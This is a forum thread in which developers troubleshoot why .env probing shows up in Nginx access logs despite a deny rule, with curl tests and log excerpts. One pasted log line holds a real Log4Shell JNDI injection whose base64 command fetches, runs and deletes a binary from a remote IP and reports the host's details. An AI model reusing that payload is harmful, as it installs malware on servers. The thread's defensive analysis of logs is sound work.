Level 122
it returned 404.
Unfortunately you can't stop people trying to access it
1 like
Apr 7, 2023
5
Level 6
Block .env scan on Ploi set up Nginx Server
I recall scans for .env were blocked via Laravel Forge setup server but on new ploi.io setup server with
location ~ /\.(?!well-known).* {
deny all;
}
as before I still saw this I access logs:
34.100.212.100 - - [08/Apr/2023:00:48:14 +0000] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
should that rule in Nginx not just block this?
Level 6
@Snapey Yeah, the .env is below the public directory so cannot be reached with ease as we use PHP Deployer with a setup with home/user/site.com/public/current a symlink for loading release data and necessary files like .env in /home/user/site.com/shared
Also, what is odd is , that when I load https://staging.site.com/.env in the browser Nginx does load a 403 forbidden Nginx error. So there Nginx does seem to block acces to it. So why a 404 in the access log for GET /.env? Perhaps because it became a request to our API? I think so.
Level 122
@rhand i guess it depends if it gets routed through index.php ?
what do you get with curl of site.com/.env ?
1 like
Level 6
curl -I https://site.com/.env
HTTP/2 403
server: nginx
date: Sun, 09 Apr 2023 07:22:16 GMT
content-type: text/html; charset=utf-8
content-length: 146
strict-transport-security: max-age=31536000; includeSubDomains
or
curl -I -4 --http1.1 https://site.com/.env
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sun, 09 Apr 2023 07:27:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains
http goes to https
curl -I http://site.com/.env
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 09 Apr 2023 07:28:17 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://site.com/.env
So perhaps the earlier request used an ip address or something.. that did not hit normal route and then got a 404. Really odd still.
Level 6
latest check on .env request and I had
cat -n 100 /var/log/nginx/access.log |grep env
cat: 100: No such file or directory
3 95.214.55.244 - - [09/Apr/2023:00:34:31 +0200] "GET / HTTP/1.1" 404 146 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')"
18 35.173.253.16 - - [09/Apr/2023:02:02:24 +0200] "GET /.env HTTP/1.1" 400 248 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
25 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 400 650 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
26 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
105 185.245.183.155 - - [09/Apr/2023:08:12:33 +0200] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
133 118.99.107.210 - - [09/Apr/2023:09:30:27 +0200] "HEAD /.env HTTP/1.1" 301 0 "-" "curl/7.87.0"
Mostly 400s but one 404 error on second request by same ip:
25 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 400 650 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
26 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
and from that ip address more abuse came https://www.abuseipdb.com/check/109.237.97.180 . But still not clear how they were able to trigger a 404. As shown earlier I only get 403s really:
curl -4 --http1.1 https://site.com/.env
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
or
curl -I -4 --http1.1 https://site.com/.env
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sun, 09 Apr 2023 08:07:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains
Please or to participate in this conversation.